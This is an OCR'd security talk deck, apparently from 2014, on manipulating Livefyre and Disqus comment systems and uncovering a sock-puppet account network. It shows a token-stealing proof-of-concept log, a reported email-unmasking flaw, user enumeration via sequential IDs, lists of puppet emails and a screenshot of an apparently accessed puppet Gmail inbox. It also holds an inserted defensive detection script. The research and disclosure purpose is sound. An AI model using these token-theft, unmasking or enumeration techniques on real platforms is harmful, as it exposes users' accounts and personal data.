need to play well for that to happen. If I don't play well, I guess I can also play 
everything," he said. 



[Screenshot: tennis.com article with Livefyre comment widget, sorted Newest | Oldest | Top Comments]
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Dan Last 

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I ©Tennis 

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I ©Tennis 

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Latest blog post: Scr New 
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Sep 23, 2014 

(venv)user@ubuntu:~/livefyre$ python poc-tokensteal.py
Running on http://127.0.0.1:5000/
Restarting with reloader
127.0.0.1 - - [07/Oct/2014 01:18:36] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [07/Oct/2014 01:18:42] "GET /script.js HTTP/1.1" 200 -
127.0.0.1 - - [07/Oct/2014 01:18:42] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [07/Oct/2014 01:18:42] "GET /favicon.ico HTTP/1.1" 404 -
Got token (eyJhb..)
Posted comment (ok)

.0.0.1 - - [07/Oct/2014 01:19:03] "GET /Iftoken/eyJhbGciOiAiSFMyNTYiLCAidHlwI jogIkpXVC39.ey3kb21haW4i 
0OTgsICJlc2VyX2lkI jogIl91cDY2NDY30DUyIn0.CwvDr6oXnzld0P8rch4- jzfU4jqR2VNVdzsLbkopAD0?r=elwslnel31w HT 



[Screenshot: www.newrepublic.com article with Livefyre comment thread (6 comments, 12 people listening); a test comment posted "just now" quoting Walter Lippmann, Public Opinion, above an existing reader comment]
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Palestine in Chile 



[Screenshot: Disqus thread "Palestine in Chile"; several antisemitic comments posted by the account HamBaconEggs (7 and 10 months ago)]
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Remember: 



We discovered that flagging 
posts got them killed? 
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IDF 

[Screenshot: IDF Facebook post, Saturday at 12:10 PM: "Please help us by marking any antisemitic and anti Israeli comments as spam!" 434 Likes, 86 Comments]

Will you help?




JTRIG 
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http://en.wikipedia.org/wiki/Joint Threat Research Intelligence Group 




























EFFECTS: Definition

"Using online techniques to make something happen in the real or cyber world"

Two broad categories:

Information Ops (Influence or disruption)
Technical disruption

Known in GCHQ as Online Covert Action

The 4 Ds
THE//INTERCEPT

[Document viewer: excerpt from the leaked JTRIG tools wiki]

SWAMP DONKEY is a tool that will silently locate all predefined types of file and encrypt them on a target's machine. Ready to fire (but see target restrictions).

TORNADO ALLEY is a delivery method (Excel Spreadsheet) that can silently extract and run an executable on a target's machine. Ready to fire (but see target restrictions).

UNDERPASS Change outcome of online polls (previously known as NUBILO). In development.

VIPERS TONGUE is a tool that will silently Denial of Service calls on a Satellite Phone or a GSM Phone. Ready to fire (but see target restrictions).

WARPATH Mass delivery of SMS messages to support an Information Operations campaign. Ready to fire.

Disqus seems ripe for the picking.
So we went looking for active armies.
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Most commented thread on 
CNN’s highest voted comment 



[Screenshot: CNN Disqus thread with 46324 comments, sorted by Best; top comment by Mimi Satterlee, 3 months ago: "I wish you a speedy and full recovery from your condition." Reply: "Thanks Son."]
Approach 
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Pick slightly controversial topic 
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Pick news orgs that cover this 

topic 
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ALJAZEERA 
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Then 



Use Disqus API to get a list of popular stories 
For each story, use the API to pull user info 
Link users to stories they commented on 



and... 










Cue a bunch of similar 
attempts to look at the data 





Decided to focus on voting 
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Voting metric 



Pull all comments for random story. 

For each comment pull the non-guest voters. 

For each voter retrieve their registration time. 
Calculate the variation in voter age on each comment. 




Variation 
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What stood out 



Accounts had been registered within minutes of each 
other. 

Their usernames and profile names had a regular 
pattern: 

• Username: <Firstname><Surname>

• Profile name: <Firstname> <Surname> 




(venv)abbot:maltego marco$ python unmask.py

Disqus Unmasker

marco@thinkst.com

-v 2919407889 1540287681 like

[*] Looking up comment 1540287681

[*] Looking up voters on comment 1540287681

NatalyaMcalpin - Natalya Mcalpin (109616253) 2014-06-05T17:46:08 117d
NerissaNiel - Nerissa Niel (109616261) 2014-06-05T17:46:13 117d
OdessaOgilvie - Odessa Ogilvie (109616307) 2014-06-05T17:46:32 117d
PaigeSwanger - Paige Swanger (109616327) 2014-06-05T17:46:42 117d
PaulinaPrivett - Paulina Privett (109616340) 2014-06-05T17:46:48 117d
RandaBallance - Randa Ballance (109616381) 2014-06-05T17:47:07 117d
RodgerRansom - Rodger Ransom (109616473) 2014-06-05T17:47:41 117d
RogerReddix - Roger Reddix (109616481) 2014-06-05T17:47:46 117d
SorayaPiotrowski - Soraya Piotrowski (109616699) 2014-06-05T17:49:34 117d
TeriClerk - Teri Clerk (109616781) 2014-06-05T17:50:07 117d
TerinaTurrell - Terina Turrell (109616790) 2014-06-05T17:50:13 117d
ThaoMcanulty - Thao Mcanulty (109616811) 2014-06-05T17:50:22 117d
TyrellTennyson - Tyrell Tennyson (109616851) 2014-06-05T17:50:40 117d
VertieValliere - Valliere (109616881) 2014-06-05T17:50:54 117d

[...]
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.23:58 55d 



disqus_0xkykFPm7E - TheTruth (117719302) 2014-08-11T00:45:34 50d



Guests Likes: 23 
(venv)abbot: maltego marco$ | 




Not exactly convincing 
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What about their emails 

addresses? 

(Hint: you really shouldn’t be able to retrieve a Disqus 

user’s email address) 
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We found an unmask attack that 
returns an email address for a 

profile name* 
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*Already reported and fixed 




Supposed puppets had emails in the form:

<Firstname><Surname>@gmail.com
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We had our suspicions, but thought 
the puppet army would be larger. 

Time to enumerate. 








User Enumeration 



Disqus users get a unique ID 
This ID is a counter (yay!) 

There are unrestricted APIs to query user information (yay! yay!) 

• https://disqus.com/api/3.0/users/details.json

We can lookup email addresses for each enumerated user with our 
unmask attack (yay! yay! yay!) 

So we pick a lower and upper bound beyond the lowest and highest 
known puppet IDs, making a range of 5k users. 



Pull details for all users. 




5k users. Now what? 



Filter on known values: 

• Must have username, name and email patterns, and 
not be verified. 

• Age is already taken into account with the ID, so less 
relevant. 




marco@playpen:~$ grep gmail.com users-109614253-109618253.txt | grep '.*([A-Z][A-Za-z]\+).*' |
7.09% 109614827 : AlainaDartez@gmail.com (AlainaDartez) 117 2014-06-05T17:35:45
7.44% 109614840 : AleciaAxley@gmail.com (AleciaAxley) 117 2014-06-05T17:35:49
7.71% 109614850 : AleshaHepner@gmail.com (AleshaHepner) 117 2014-06-05T17:35:54
7.90% 109614857 : AllynAlfrey@gmail.com (AllynAlfrey) 117 2014-06-05T17:35:58
8.17% 109614867 : AlmaArmwood@gmail.com (AlmaArmwood) 117 2014-06-05T17:36:03
8.49% 109614879 : AlvinNolan@gmail.com (AlvinNolan) 117 2014-06-05T17:36:07
8.85% 109614892 : AmadoGorman@gmail.com (AmadoGorman) 117 2014-06-05T17:36:12
9.12% 109614902 : AngelinaCrespo@gmail.com (AngelinaCrespo) 117 2014-06-05T17:36:17
9.47% 109614915 : AngelynAleman@gmail.com (AngelynAleman) 117 2014-06-05T17:36:22
9.74% 109614925 : AntoinetteAlcorn@gmail.com (AntoinetteAlcorn) 117 2014-06-05T17:36:27
10.06% 109614937 : ArdenApril@gmail.com (ArdenApril) 117 2014-06-05T17:36:32
10.22% 109614943 : BeatrizBuchholtz@gmail.com (BeatrizBuchholtz) 117 2014-06-05T17:36:37
10.49% 109614953 : BelvaSeckman@gmail.com (BelvaSeckman) 117 2014-06-05T17:36:42
10.79% 109614964 : BriceBosket@gmail.com (BriceBosket) 117 2014-06-05T17:36:46
11.06% 109614974 : BrookePlate@gmail.com (BrookePlate) 117 2014-06-05T17:36:50
11.36% 109614985 : BryannaCallanan@gmail.com (BryannaCallanan) 117 2014-06-05T17:36:55
11.63% 109614995 : CarmanComan@gmail.com (CarmanComan) 117 2014-06-05T17:36:59
11.85% 109615003 : CatarinaCountryman@gmail.com (CatarinaCountryman) 117 2014-06-05T17:37:04
12.01% 109615009 : CherelleCostner@gmail.com (CherelleCostner) 117 2014-06-05T17:37:08
12.33% 109615021 : ChristeenChien@gmail.com (ChristeenChien) 117 2014-06-05T17:37:13
12.58% 109615030 : ChristelDecola@gmail.com (ChristelDecola) 117 2014-06-05T17:37:17
12.82% 109615039 : ChrystalCryan@gmail.com (ChrystalCryan) 117 2014-06-05T17:37:22
13.20% 109615053 : CicelyCorrell@gmail.com (CicelyCorrell) 117 2014-06-05T17:37:26
13.52% 109615065 : ClarineChavarria@gmail.com (ClarineChavarria) 117 2014-06-05T17:37:32
13.90% 109615079 : ClarineHeeren@gmail.com (ClarineHeeren) 117 2014-06-05T17:37:37
14.25% 109615092 : CletaEvans@gmail.com (CletaEvans) 117 2014-06-05T17:37:42
14.66% 109615107 : ConnieCola@gmail.com (ConnieCola) 117 2014-06-05T17:37:48
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So Far 



Accounts with 

• Patterned profile names 

• Patterned usernames 

• Patterned emails 

• Similar registration times 

• Regular inter-registration delays 

• Alphabetical progression in usernames 
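A defender-side scorer for the indicators collected above, covering both the "Voting metric" slide (variation in voter registration age per comment) and this "So Far" list. This is an added example, not Thinkst's unmask.py or any Disqus code: it parses voter records in the shape of the unmask listing shown earlier and scores the registration-window, inter-registration-delay, username-pattern and alphabetical-progression signals. The thresholds and the sample voter lines are constructed assumptions.

```python
# Added example (not Thinkst's unmask.py): scores sock-puppet indicators for
# the non-guest voters on one comment. Voter records use the unmask listing
# shape 'User - Profile Name (id) 2014-06-05T17:46:08 117d'. Thresholds and
# sample voters below are constructed assumptions.
import re
from datetime import datetime
from statistics import mean, pstdev

LINE_RE = re.compile(
    r"^(?P<username>\S+) - (?P<name>.+?) \((?P<uid>\d+)\) "
    r"(?P<registered>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})"
)
# <Firstname><Surname>: two capitalised words run together, nothing else.
PATTERN_RE = re.compile(r"^[A-Z][a-z]+[A-Z][a-z]+$")

# Constructed sample voters: a scripted batch registered 5 seconds apart with
# near-consecutive IDs, and an organic mix registered over two years.
PUPPET_VOTERS = [
    "AbbyAdler - Abby Adler (200000101) 2014-06-05T17:46:08 117d",
    "BrettBaines - Brett Baines (200000109) 2014-06-05T17:46:13 117d",
    "CaraCobb - Cara Cobb (200000117) 2014-06-05T17:46:18 117d",
    "DeanDuffy - Dean Duffy (200000126) 2014-06-05T17:46:23 117d",
    "EllaEvans - Ella Evans (200000134) 2014-06-05T17:46:28 117d",
]
ORGANIC_VOTERS = [
    "mike_b - Mike (41200110) 2012-03-14T09:02:51 966d",
    "sandra.k - Sandra K (87766122) 2013-08-21T22:17:05 412d",
    "jdoe99 - John Doe (105001234) 2014-08-01T12:00:00 67d",
    "TheTruth2014 - The Truth (117719302) 2014-08-11T00:45:34 50d",
]


def parse_voter(line):
    """Parse one listing line; the trailing account age ('117d') is ignored."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised voter line: %r" % line)
    return {"username": m.group("username"), "name": m.group("name"),
            "uid": int(m.group("uid")),
            "registered": datetime.strptime(m.group("registered"),
                                            "%Y-%m-%dT%H:%M:%S")}


def registration_window(voters):
    """Seconds between the earliest and latest registration among the voters."""
    ts = [v["registered"] for v in voters]
    return (max(ts) - min(ts)).total_seconds()


def delay_regularity(voters):
    """Coefficient of variation of the gaps between consecutive registrations
    in user-ID order (the ID is a counter). Near 0 means a scripted cadence;
    None when there are too few gaps to judge."""
    ordered = sorted(voters, key=lambda v: v["uid"])
    gaps = [(b["registered"] - a["registered"]).total_seconds()
            for a, b in zip(ordered, ordered[1:])]
    if len(gaps) < 2 or mean(gaps) <= 0:
        return None
    return pstdev(gaps) / mean(gaps)


def is_patterned(voter):
    """Username is <Firstname><Surname> and the profile name is the same words."""
    return bool(PATTERN_RE.match(voter["username"])) and \
        voter["name"].replace(" ", "") == voter["username"]


def alphabetical_fraction(voters):
    """Share of ID-ordered neighbours whose usernames are also alphabetical."""
    names = [v["username"].lower() for v in sorted(voters, key=lambda v: v["uid"])]
    pairs = list(zip(names, names[1:]))
    return sum(a <= b for a, b in pairs) / len(pairs) if pairs else 0.0


def score_voters(lines, window_s=3600, cv_max=0.5, pattern_min=0.8, alpha_min=0.8):
    """Return (flagged, indicators) for the non-guest voters on one comment.
    Thresholds are assumptions; flag when at least three indicators fire."""
    voters = [parse_voter(line) for line in lines]
    if not voters:
        return False, {"voters": 0, "hits": 0}
    ind = {"voters": len(voters),
           "window_s": registration_window(voters),
           "delay_cv": delay_regularity(voters),
           "patterned": sum(is_patterned(v) for v in voters) / len(voters),
           "alphabetical": alphabetical_fraction(voters)}
    ind["hits"] = sum([ind["window_s"] <= window_s,
                       ind["delay_cv"] is not None and ind["delay_cv"] <= cv_max,
                       ind["patterned"] >= pattern_min,
                       ind["alphabetical"] >= alpha_min])
    return ind["hits"] >= 3, ind
```

Run `score_voters(PUPPET_VOTERS)` and `score_voters(ORGANIC_VOTERS)` to see all four indicators fire for the scripted batch and none for the organic voters; a hit count of one or two on a live thread is where a moderator would want to look rather than act.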




Disqus lets us map usernames 
to forums where they’re active 
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Jerusalem Post (297) 
[Graph: Disqus Username -> Disqus Forum Name; Jerusalem Post (297), AJ English (1077), CNN (5647)]



Disqus also lets us map 
usernames to comments* 
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*lncluding “Private” profiles 




[Graph: usernames TeraTaveras, OnitaStrahan, TheolaBach, RodgerRansom, YajairaSaia and PaulinaPrivett all linked to the same comment text: "There no hasbaRats defending the indefensible i"]
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So 
Far

• Accounts with
  • Patterned profile names
  • Patterned usernames
  • Patterned emails
  • Similar registration times
  • Regular inter-registration delays
  • Alphabetical progression in usernames

• And
  • Active on the same set of sites
  • Shared duplicate comments across accounts
  • Vote for each other’s comments to push them up




Puppet army size: 186 confirmed
Period of activity: Four months (2014-06-5)
Comments posted: 7269
Unique comments: 5782 (1487 dups)
Primary targeted forums: CNN, Al Jazeera, Jerusalem Post
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What are they saying? 
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Consistent multi-faceted views 



• Pro-Palestine 

• Anti-Israel 

• Anti-ISIS/L 

• Writes “We (USA)”, presents as Western 

• Anti-Syria 

• Anti-Obama 

• Pro-Islam (Writes “I am Christian and I know that Christianity is worst 
religion in the world” :) 




So who is this? 
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No idea. Anything is pure 

speculation. 
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Ways out? 




Shut down this puppet army 
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£3 https://mail.google.eom/mail/#inbox 




[Screenshot: Gmail inbox of sorayapiotrowski@gmail.com, 1-3 of 3: "Disqus Digests - Top conversations on Al Jazeera English" (Oct 2), "Disqus - Re: New comment posted on ISIL under heavy assault by Kurds in Iraq" (Oct 1), "Disqus - Disqus Password Reset Confirmation - Hi SorayaPiotrowski, You have recently..." (Oct 1)]

[Screenshot: https://disqus.com/home/inbox notifications for SorayaPiotrowski: "Aboubakr and 4 others upvoted you on ISIL under heavy assault by Kurds in Iraq" (a day ago); pending comment "Congratulations O muslims on the advent of the auspicious occasion of Eid (Saturday) as well as the..." (2 days ago); "Bruisse upvoted you on Arabs in Israel decry racial discrimination" (2 days ago)]
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Disqus limiting their API. 
(This would be a bad idea.) 








Puppetry is very likely happening in other 
places. 

But without the same amount of data, we 
can’t tell. 

Disqus’ open data approach is great for 
identifying these relationships and patterns, 
and we want to give them shouts for it. 



(But fix the unmask attacks.) 




Summary 
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Without exception, all of the UGC sites 
we have looked at have proven to be fairly 
trivial to manipulate 

It is clear that this abuse is already taking 
place on many of them 

• Be aware of it; 

• Build tools to help deal with it; 
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